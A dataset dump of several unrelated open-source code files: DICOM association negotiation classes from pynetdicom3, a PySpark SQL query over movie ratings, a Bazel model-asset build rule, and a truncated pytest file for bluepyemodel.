item.FromParams(self)\n\n return item\n\n @property\n def implementation_version_name(self):\n \"\"\"Return the Implementation Version Name.\"\"\"\n return self._implementation_version_name\n\n @implementation_version_name.setter\n def implementation_version_name(self, value):\n \"\"\"Sets the Implementation Version Name parameter.\n\n Parameters\n ----------\n value : str or bytes\n The value for the Implementation Version Name\n\n Raises\n ------\n TypeError\n If `value` is not a str or bytes\n ValueError\n If `value` is empty or longer than 16 characters\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, str):\n value = codecs.encode(value, 'utf-8')\n elif isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Implementation Version Name must be a str or bytes\")\n raise TypeError(\"Implementation Version Name must be a str \"\n \"or bytes\")\n\n if value is not None and not 1 < len(value) < 17:\n raise ValueError(\"Implementation Version Name must be \"\n \"between 1 and 16 characters long\")\n\n self._implementation_version_name = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Implementation Version Name\\n\"\n s += \" Implementation version name: {0!s}\\n\".format(\n self.implementation_version_name)\n return s\n\n\nclass AsynchronousOperationsWindowNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the maximum number of outstanding operation\n or sub-operation requests. This negotiation is optional.\n\n The Asynchronous Operations Window is optional and there may only be a\n single AsynchronousOperationsWindowNegotiation item\n\n PS3.7 Annex D.3.3.3\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n maximum_number_operations_invoked : int\n The maximum number of asynchronous operations invoked by the AE. A\n value of 0 indicates unlimited operations (default 1)\n maximum_number_operations_performed : int\n The maximum number of asynchronous operations performed by the AE. A\n value of 0 indicates unlimited operations (default 1)\n \"\"\"\n\n def __init__(self):\n self.maximum_number_operations_invoked = 1\n self.maximum_number_operations_performed = 1\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.AsynchronousOperationsWindowSubItem\n \"\"\"\n item = AsynchronousOperationsWindowSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def maximum_number_operations_invoked(self):\n \"\"\"Return the Maximum Number Operations Invoked.\"\"\"\n return self._maximum_number_operations_invoked\n\n @maximum_number_operations_invoked.setter\n def maximum_number_operations_invoked(self, value):\n \"\"\"Sets the Maximum Number Operations Invoked parameter.\n\n Parameters\n ----------\n value : int\n The maximum number of operations invoked\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n pass\n else:\n LOGGER.error(\"Maximum Number Operations Invoked must be an int\")\n raise TypeError(\"Maximum Number Operations Invoked must be an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Invoked must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_invoked = value\n\n @property\n def maximum_number_operations_performed(self):\n \"\"\"Return the Maximum Number Operations Performed.\"\"\"\n return self._maximum_number_operations_performed\n\n @maximum_number_operations_performed.setter\n def maximum_number_operations_performed(self, value):\n \"\"\"\n Sets the Maximum Number Operations Performed parameter\n\n Parameters\n ----------\n value : int\n The maximum number of operations performed\n\n Raises\n ------\n TypeError\n If `value` is not an int\n ValueError\n If `value` is less than 0\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if not isinstance(value, int):\n LOGGER.error(\"Maximum Number Operations Performed must be an int\")\n raise TypeError(\"Maximum Number Operations Performed must be \"\n \"an int\")\n\n if value < 0:\n raise ValueError(\"Maximum Number Operations Performed must be \"\n \"greater than 0\")\n\n self._maximum_number_operations_performed = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = \"Asynchronous Operations Window\\n\"\n s += \" Maximum number operations invoked: {0:d}\\n\".format(\n self.maximum_number_operations_invoked)\n s += \" Maximum number operations performed: {0:d}\\n\".format(\n self.maximum_number_operations_performed)\n return s\n\n\nclass SCP_SCU_RoleSelectionNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to negotiate the roles in which they will serve for each\n SOP Class or Meta SOP Class supported on the Association. This negotiation\n is optional.\n\n The Association Requestor may use one SCP/SCU Role Selection item for each\n SOP Class as identified by its corresponding Abstract Syntax Name and shall\n be one of three role values:\n - Requestor is SCU only\n - Requestor is SCP only\n - Requestor is both SCU/SCP\n\n If the SCP/SCU Role Selection item is absent the default role for a\n Requestor is SCU and for an Acceptor is SCP.\n\n For a Requestor support for each SOP Class shall be one of the following\n roles:\n * Requestor is SCU only\n * Requestor is SCP only\n * Requestor is both SCU and SCP\n\n PS3.7 Annex D.3.3.4\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Abstract Syntax\n scu_role : bool\n False for non-support of the SCU role, True for support\n scp_role : bool\n False for non-support of the SCP role, True for support\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.scu_role = None\n self.scp_role = None\n\n def from_primitive(self):\n \"\"\"\n Convert the primitive to a PDU item ready to be encoded\n\n Returns\n -------\n item : pynetdicom3.pdu.SCP_SCU_RoleSelectionSubItem\n\n Raises\n ------\n ValueError\n If no SOP Class UID, SCU Role or SCP Role is set\n ValueError\n If SCU Role and SCP Role are both False\n \"\"\"\n if self.sop_class_uid is None or self.scu_role is None \\\n or self.scp_role is None:\n LOGGER.error(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n raise ValueError(\"SOP Class UID, SCU Role and SCP Role must \"\n \"to be set prior to Association\")\n\n # To get to this point self.sop_class_uid must be set\n if not self.scu_role and not self.scp_role:\n LOGGER.error(\"SCU and SCP Roles cannot both be unsupported \"\n \"for %s\", self.sop_class_uid)\n raise ValueError(\"SCU and SCP Roles cannot both be unsupported \"\n \"for {}\".format(self.sop_class_uid))\n\n item = SCP_SCU_RoleSelectionSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def scu_role(self):\n \"\"\"Return the SCU Role.\"\"\"\n return self._scu_role\n\n @scu_role.setter\n def scu_role(self, value):\n \"\"\"Sets the SCU Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCU Role must be boolean\")\n raise TypeError(\"SCU Role must be boolean\")\n\n self._scu_role = value\n\n @property\n def scp_role(self):\n \"\"\"Return the SCP Role.\"\"\"\n return self._scp_role\n\n @scp_role.setter\n def scp_role(self, value):\n \"\"\"Sets the SCP Role parameter.\n\n Parameters\n ----------\n value : bool\n True if supported, False otherwise (default)\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"SCP Role must be boolean\")\n raise TypeError(\"SCP Role must be boolean\")\n\n self._scp_role = value\n\n\nclass SOPClassExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange application information defined by specific\n Service Class specifications. Each Service Class is required to document\n the application information it supports and how this information is\n negotiated between SCUs and SCPs.\n\n The SOP Class Extended Negotiation is optional and there may only be a\n single SOPClassExtendedNegotiation item for each available SOP Class UID.\n\n PS3.7 Annex D.3.3.5\n\n PS3.4 contains Service Class Specifications\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_application_information : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_application_information = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_application_information` are\n not set\n \"\"\"\n if self.sop_class_uid is None \\\n or self.service_class_application_information is None:\n LOGGER.error(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n raise ValueError(\"SOP Class UID and Service Class Application \"\n \"Information must be set prior to Association \"\n \"negotiation\")\n\n item = SOPClassExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Abstract Syntax UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_application_information(self):\n \"\"\"Return the Service Class Application Information.\"\"\"\n return self._service_class_application_information\n\n @service_class_application_information.setter\n def service_class_application_information(self, value):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n value : bytes\n The Service Class Application Information as per the Service Class\n Specifications (see PS3.4)\n\n Raises\n ------\n TypeError\n If `value` is not a bytes object\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class Application Information should be a \"\n \"bytes object\")\n raise TypeError(\"Service Class Application Information should \"\n \"be a bytes object\")\n\n self._service_class_application_information = value\n\n\nclass SOPClassCommonExtendedNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.6\n\n Identical for both A-ASSOCIATE-RQ and A-ASSOCIATE-AC\n\n Attributes\n ----------\n sop_class_uid : pydicom.uid.UID, bytes or str\n The UID of the SOP Class\n service_class_uid : pydicom.uid.UID, bytes or str\n The UID of the corresponding Service Class\n related_general_sop_class_uid : list of (pydicom.uid.UID, bytes or str)\n Related General SOP Class UIDs (optional)\n \"\"\"\n\n def __init__(self):\n self.sop_class_uid = None\n self.service_class_uid = None\n self.related_general_sop_class_identification = []\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.SOPClassCommonExtendedNegotiationSubItem\n\n Raises\n ------\n ValueError\n If `sop_class_uid` or `service_class_uid` are not set\n \"\"\"\n if self.sop_class_uid is None or self.service_class_uid is None:\n LOGGER.error(\"SOP Class UID and Service Class UID must be set \"\n \"prior to Association negotiation\")\n raise ValueError(\"SOP Class UID and Service Class UID must be \"\n \"set prior to Association negotiation\")\n\n item = SOPClassCommonExtendedNegotiationSubItem()\n item.FromParams(self)\n\n return item\n\n @property\n def sop_class_uid(self):\n \"\"\"Return the SOP Class UID.\"\"\"\n return self._sop_class_uid\n\n @sop_class_uid.setter\n def sop_class_uid(self, value):\n \"\"\"Sets the SOP Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The SOP Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"SOP Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._sop_class_uid = value\n\n @property\n def service_class_uid(self):\n \"\"\"Return the Service Class UID.\"\"\"\n return self._service_class_uid\n\n @service_class_uid.setter\n def service_class_uid(self, value):\n \"\"\"Sets the Service Class UID parameter.\n\n Parameters\n ----------\n value : pydicom.uid.UID, bytes or str\n The corresponding Service Class UID\n\n Raises\n ------\n TypeError\n If `value` is not a pydicom.uid.UID, bytes or str\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, UID):\n pass\n elif isinstance(value, str):\n value = UID(value)\n elif isinstance(value, bytes):\n value = UID(value.decode('utf-8'))\n elif value is None:\n pass\n else:\n LOGGER.error(\"Service Class UID must be a pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Service Class UID must be a pydicom.uid.UID, \"\n \"str or bytes\")\n\n if value is not None and not value.is_valid:\n LOGGER.error(\"Implementation Class UID is an invalid UID\")\n raise ValueError(\"Implementation Class UID is an invalid UID\")\n\n self._service_class_uid = value\n\n @property\n def related_general_sop_class_identification(self):\n \"\"\"Return the Related General SOP Class Identification\"\"\"\n return self._related_general_sop_class_identification\n\n @related_general_sop_class_identification.setter\n def related_general_sop_class_identification(self, uid_list):\n \"\"\"Sets the Service Class Application Information parameter.\n\n Parameters\n ----------\n uid_list : list of (pydicom.uid.UID, bytes or str)\n A list containing UIDs to be used in the Related General SOP Class\n Identification parameter\n\n Raises\n ------\n TypeError\n If `uid_list` is not a list\n ValueError\n If `uid_list` contains items that aren't UIDs\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(uid_list, list):\n # Test that all the items in the list are UID compatible and convert\n # them to pydicom.uid.UID if required\n valid_uid_list = []\n\n for uid in uid_list:\n if isinstance(uid, UID):\n pass\n elif isinstance(uid, str):\n uid = UID(uid)\n elif isinstance(uid, bytes):\n uid = UID(uid.decode('utf-8'))\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class \"\n \"Identification must be a list of \"\n \"pydicom.uid.UID, str or bytes\")\n\n if uid is not None and not uid.is_valid:\n LOGGER.error(\"Related General SOP Class \"\n \"Identification contains an invalid UID\")\n raise ValueError(\"Related General SOP Class contains \"\n \"an invalid UID\")\n\n valid_uid_list.append(uid)\n\n self._related_general_sop_class_identification = valid_uid_list\n else:\n LOGGER.error(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n raise TypeError(\"Related General SOP Class Identification \"\n \"must be a list of pydicom.uid.UID, str \"\n \"or bytes\")\n\n\nclass UserIdentityNegotiation(ServiceParameter):\n \"\"\"\n Allows peer AEs to exchange generic application information.\n\n The SOP Class Common Extended Negotiation is optional and there may only be\n a single SOPClassCommonExtendedNegotiation item for each available SOP\n Class UID.\n\n PS3.7 Annex D.3.3.7\n\n In general, a User Identity Negotiation request that is accepted will result\n in Association establishment and possibly a server response if requested\n and supported by the peer. If a server response is requested but not\n received then the Requestor must decide how to proceed.\n An Association rejected due to an authorisation failure will be indicated\n using Rejection Permanent with a Source of \"DICOM UL service provided (ACSE\n related function)\".\n\n How the Acceptor handles authentication is to be implemented by the end-user\n and is outside the scope of the DICOM standard.\n\n A-ASSOCIATE-RQ\n `user_identity_type`\n `positive_response_requested`\n `primary_field`\n `secondary_field`\n\n A-ASSOCIATE-AC\n The `server_response` parameter is required when a response to the User\n Identity Negotiation request is to be issued (although this depends on\n whether or not this is supported by the Acceptor).\n\n Attributes\n ----------\n user_identity_type : int or None\n A-ASSOCIATE-RQ only. One of the following values:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n positive_response_requested : bool\n A-ASSOCIATE-RQ only. True when requesting a response, False otherwise\n (default is False)\n primary_field : bytes or None\n A-ASSOCIATE-RQ only. Contains either the username, Kerberos Service\n ticket or SAML assertion depending on `user_identity_type`.\n secondary_field : bytes or None\n A-ASSOCIATE-RQ only. Only required if the `user_identity_type` is 2,\n when it should contain the passcode as a bytes object, None otherwise\n server_response : bytes or None\n A-ASSOCIATE-AC only. Shall contain the Kerberos Service ticket or SAML\n response if the `user_identity_type` in the Request was 3 or 4. Shall be\n None if `user_identity_type` was 1 or 2.\n \"\"\"\n\n def __init__(self):\n self.user_identity_type = None\n self.positive_response_requested = False\n self.primary_field = None\n self.secondary_field = None\n self.server_response = None\n\n def from_primitive(self):\n \"\"\"Convert the primitive to a PDU item ready to be encoded.\n\n Returns\n -------\n item : pynetdicom3.pdu.UserIdentitySubItemRQ or\n pynetdicom3.pdu.UserIdentitySubItemAC\n\n Raises\n ------\n ValueError\n If server_response is None and user_identity_type or primary_field\n are None\n ValueError\n If server_response is None and user_identity_type is 2 and\n secondary_field is None\n \"\"\"\n # Determine if this primitive is an -RQ or -AC\n if self.server_response is None:\n # Then an -RQ\n if self.user_identity_type is None or self.primary_field is None:\n LOGGER.error(\"User Identity Type and Primary Field must be \"\n \"set prior to Association negotiation\")\n raise ValueError(\"User Identity Type and Primary Field \"\n \"must be set prior to Association negotiation\")\n\n if self.user_identity_type == 2 and self.secondary_field is None:\n LOGGER.error(\"Secondary Field must be set when User Identity\"\n \"is 2\")\n raise ValueError(\"Secondary Field must be set when User \"\n \"Identity is 2\")\n\n item = UserIdentitySubItemRQ()\n\n else:\n # Then an -AC\n item = UserIdentitySubItemAC()\n\n item.FromParams(self)\n\n return item\n\n @property\n def user_identity_type(self):\n \"\"\"Return the User Identity Type.\"\"\"\n return self._user_identity_type\n\n @user_identity_type.setter\n def user_identity_type(self, value):\n \"\"\"Sets the User Identity Type parameter.\n\n Parameters\n ----------\n value : int\n One of the following:\n * 1 - Username as string in UTF-8\n * 2 - Username as string in UTF-8 and passcode\n * 3 - Kerberos Service ticket\n * 4 - SAML Assertion\n\n Raises\n ------\n TypeError\n If `value` is not an int or None\n ValueError\n If `value` is an int and is not 1, 2, 3 or 4\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, int):\n if value not in [1, 2, 3, 4]:\n LOGGER.error(\"User Identity Type must be 1, 2 3 or 4 if \"\n \"requesting Association, None otherwise\")\n raise ValueError(\"User Identity Type must be 1, 2 3 or 4 \"\n \"if requesting Association, None otherwise\")\n elif value is None:\n pass\n else:\n LOGGER.error(\"User Identity Type must be an int or None\")\n raise TypeError(\"User Identity Type must be an int or None\")\n\n self._user_identity_type = value\n\n @property\n def positive_response_requested(self):\n \"\"\"Return Positive Response Requested.\"\"\"\n return self._positive_response_requested\n\n @positive_response_requested.setter\n def positive_response_requested(self, value):\n \"\"\"Sets the Positive Response Requested parameter.\n\n Parameters\n ----------\n value : bool\n True if response requested, False otherwise\n\n Raises\n ------\n TypeError\n If `value` is not a bool\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bool):\n pass\n else:\n LOGGER.error(\"Positive Response Requested must be boolean\")\n raise TypeError(\"Positive Response Requested must be boolean\")\n\n self._positive_response_requested = value\n\n @property\n def primary_field(self):\n \"\"\"Return Primary Field.\"\"\"\n return self._primary_field\n\n @primary_field.setter\n def primary_field(self, value):\n \"\"\"Sets the Primary Field parameter.\n\n Parameters\n ----------\n value : bytes or None\n The username or Kerberos Service ticket as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n raise TypeError(\"Primary Field must be bytes if requesting \"\n \"Association, None otherwise\")\n\n self._primary_field = value\n\n @property\n def secondary_field(self):\n \"\"\"Return the Secondary Field.\"\"\"\n return self._secondary_field\n\n @secondary_field.setter\n def secondary_field(self, value):\n \"\"\"Sets the Secondary Field parameter.\n\n Only used when User Identity Type is equal to 2.\n\n Parameters\n ----------\n value : bytes or None\n The passcode as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n raise TypeError(\"Secondary Field must be bytes if requesting \"\n \"Association with User Identity Type equal to 2, \"\n \"None otherwise\")\n\n self._secondary_field = value\n\n @property\n def server_response(self):\n \"\"\"Return the Server Response.\"\"\"\n return self._server_response\n\n @server_response.setter\n def server_response(self, value):\n \"\"\"Sets the Server Response parameter.\n\n Parameters\n ----------\n value : bytes or None\n The server response as a bytes object\n\n Raises\n ------\n TypeError\n If `value` is not bytes or None\n \"\"\"\n # pylint: disable=attribute-defined-outside-init\n if isinstance(value, bytes):\n pass\n elif value is None:\n pass\n else:\n LOGGER.error(\"Server Response must be bytes or None\")\n raise TypeError(\"Server Response must be bytes or None\")\n\n self._server_response = value\n\n def __str__(self):\n \"\"\"String representation of the class.\"\"\"\n s = 'User Identity Parameters\\n'\n if self.server_response is None:\n s += ' User identity type: {0:d}\\n'.format(\n self.user_identity_type)\n s += ' Positive response requested: {0!r}\\n' \\\n .format(self.positive_response_requested)\n s += ' Primary field: {0!s}\\n'.format(self.primary_field)\n s += ' Secondary field: {0!s}\\n'.format(self.secondary_field)\n else:\n s += ' Server response: {0!s}\\n'.format(self.server_response)\n\n return s\n","repo_name":"zdalih/wolfpacs","sub_path":"pnd3/pynetdicom3/pdu_primitives.py","file_name":"pdu_primitives.py","file_ext":"py","file_size_in_byte":77037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"20111499961","text":"from pyspark.sql import SparkSession\nimport sys\nspark = SparkSession.builder.appName(\"Query3_SparkSQL\").getOrCreate()\n\n# The user must give the input format (csv || parquet)\n\n# For example:\n# spark-submit SparkSqlquery3.py csv\n# to read csv file\n\ninput_format = sys.argv[1]\n\nif input_format == 'parquet':\n movie_genres = spark.read.parquet(\"hdfs://master:9000/movies/movie_genres.parquet\")\n movies = spark.read.parquet(\"hdfs://master:9000/movies/movies.parquet\")\n ratings = spark.read.parquet(\"hdfs://master:9000/movies/ratings.parquet\")\nelse:\n movies = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movies.csv\")\n movie_genres = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/movie_genres.csv\")\n ratings = spark.read.option(\"header\",\"false\").option(\"delimiter\",\",\").option(\"inferSchema\",\"true\").csv(\"hdfs://master:9000/movies/ratings.csv\")\n\nmovies.registerTempTable(\"movies\")\nratings.registerTempTable(\"ratings\")\nmovie_genres.registerTempTable(\"movie_genres\")\n\nsqlString = \"select a.Genre as Movie_Genre, avg(b.Rating) as Avg_Rating, count(b.ID) as No_of_movies \\\n from \\\n (select distinct _c1 as Genre, _c0 as aID from movie_genres)a \\\n inner join ( \\\n select distinct _c1 as ID, avg(_c2) as Rating from ratings where _c2 is not null group by _c1\\\n )b \\\n on a.aID = b.ID \\\n group by Genre\\\n order by Genre\"\n\nres = spark.sql(sqlString)\nres.show()","repo_name":"FayStatha/atds-project-NTUA-2021","sub_path":"code/PART A/Spark SQL/SparkSqlquery3.py","file_name":"SparkSqlquery3.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38364513697","text":"\"\"\"Build Model assets from source 3d asset files like fbx, obj, gltf, etc.\"\"\"\n\nload(\"//third_party/fplbase:build_defs.bzl\", \"fpl_png_assets\")\n\ndef build_model(\n name,\n srcs,\n textures = [],\n extra_srcs = [],\n strip_prefix = \"\",\n attrib = None,\n ext = \"lullmodel\",\n visibility = [\"//visibility:public\"]):\n \"\"\"Generates a fplmesh binary from source files.\n\n Args:\n name: name for the filegroup contain the set of generated motiveanim files\n srcs: list of 3d asset files\n textures: list of all textures associated with the model\n strip_prefix: optional string, will be stripped from all input file paths\n in output file generation. All subdirectories after\n strip_prefix will be retained.\n attrib: a string specifying which vertex attributes should be output.\n ext: A file extension to replace each input file extension with for output.\n visibility: The visibility of the entity target. Defaults to public.\n \"\"\"\n tool = \"//lullaby/tools/model_pipeline\"\n\n outs = []\n textures_name = \"%s_textures\" % name\n if textures:\n fpl_png_assets(\n name = textures_name,\n srcs = textures,\n strip_prefix = strip_prefix,\n webp_quality = 90,\n )\n\n for src in srcs:\n # Replace source file extension with output file extension\n out = \".\".join(src.split(\".\")[:-1]) + \".\" + ext\n if strip_prefix:\n out = out.split(strip_prefix + \"/\")[-1]\n\n cmd = []\n if textures:\n cmd += [\"textures=\\\"\\\";\"]\n cmd += [\"for f in $(locations %s); do\" % (\":\" + textures_name)]\n cmd += [\" textures+=$$f\\\";\\\";\"]\n cmd += [\"done;\"]\n cmd += [\"$(location %s)\" % tool]\n cmd += [\"--input $(location %s)\" % src]\n cmd += [\"--schema schemas/lull/model_pipeline_def.fbs\"]\n if attrib:\n cmd += [\"--attrib %s\" % attrib]\n if ext:\n cmd += [\"--ext %s\" % ext]\n cmd += [\"--outdir $(@D)\"]\n cmd += [\"--output $@\"]\n genrule_srcs = [src]\n if textures:\n cmd += [\"--textures \\\"$$textures\\\";\"]\n genrule_srcs += [\":\" + textures_name]\n if extra_srcs:\n genrule_srcs += extra_srcs\n\n native.genrule(\n name = \"build_%s\" % out,\n srcs = genrule_srcs,\n tools = [\"//:model_schema\"] + [tool],\n outs = [out],\n cmd = \" \".join(cmd),\n )\n outs += [out]\n\n native.filegroup(name = name, srcs = outs, visibility = visibility)\n","repo_name":"google/lullaby","sub_path":"dev/build_model.bzl","file_name":"build_model.bzl","file_ext":"bzl","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":1170,"dataset":"github-code","pt":"16"}
+{"seq_id":"17417091053","text":"import pytest\nfrom pathlib import Path\nimport json\n\nfrom bluepyemodel.access_point import get_access_point\nfrom dictdiffer import diff\n\nTEST_ROOT = Path(__file__).parents[1]\nDATA = TEST_ROOT / \"test_data\"\n\n\n@pytest.fixture\ndef api_config():\n return {\n \"emodel\": \"cADpyr_L5TPC\",\n \"emodel_dir\": DATA,\n \"recipes_path\": DATA / \"config/recipes.json\",\n }\n\n\n@pytest.fixture\ndef db(api_config):\n return get_access_point(\"local\", **api_config)\n\n\ndef test_get_morphologies(db):\n morphology = db.get_morphologies()\n assert morphology[\"name\"] == \"C060114A5\"\n assert Path(morphology[\"path\"]).name == \"C060114A5.asc\"\n\n\ndef test_get_available_morphologies(db):\n names = db.get_available_morphologies()\n assert len(names) == 1\n assert list(names)[0] == \"C060114A5\"\n\n\ndef test_get_recipes(db):\n recipes = db.get_recipes()\n # json.dump(recipes, open(DATA / \"test_recipes.json\", \"w\"))\n expected_recipes = json.load(open(DATA / \"test_recipes.json\", \"r\"))\n assert list(diff(recipes, expected_recipes)) == []\n\n\ndef test_get_model_configuration(db):\n\n configuration = db.get_model_configuration()\n\n expected_parameters = json.load(open(DATA / \"test_parameters.json\", \"r\"))\n expected_mechanisms = json.load(open(DATA / \"test_mechanisms.json\", \"r\"))\n\n for p in configuration.parameters:\n assert p.location in expected_parameters[\"parameters\"]\n for ep in expected_parameters[\"parameters\"][p.location]:\n if ep[\"name\"] == p.name and ep[\"val\"] == p.value:\n break\n else:\n raise Exception(\"missing parameter\")\n\n assert sorted(list(configuration.mechanism_names)) == [\n \"CaDynamics_DC0\",\n \"Ca_HVA2\",\n \"Ca_LVAst\",\n \"Ih\",\n \"K_Pst\",\n \"K_Tst\",\n \"NaTg\",\n \"Nap_Et2\",\n \"SK_E2\",\n \"SKv3_1\",\n \"pas\",\n ]\n\n\ndef test_get_final(db):\n final = db.get_final()\n assert \"cADpyr_L5TPC\" in final\n assert \"parameters\" in final[\"cADpyr_L5TPC\"] or \"params\" in final[\"cADpyr_L5TPC\"]\n\n\ndef test_load_pipeline_settings(db):\n assert db.pipeline_settings.path_extract_config == \"tests/test_data/config/config_dict.json\"\n assert db.pipeline_settings.validation_protocols == [\"APWaveform_140\"]\n\n\ndef 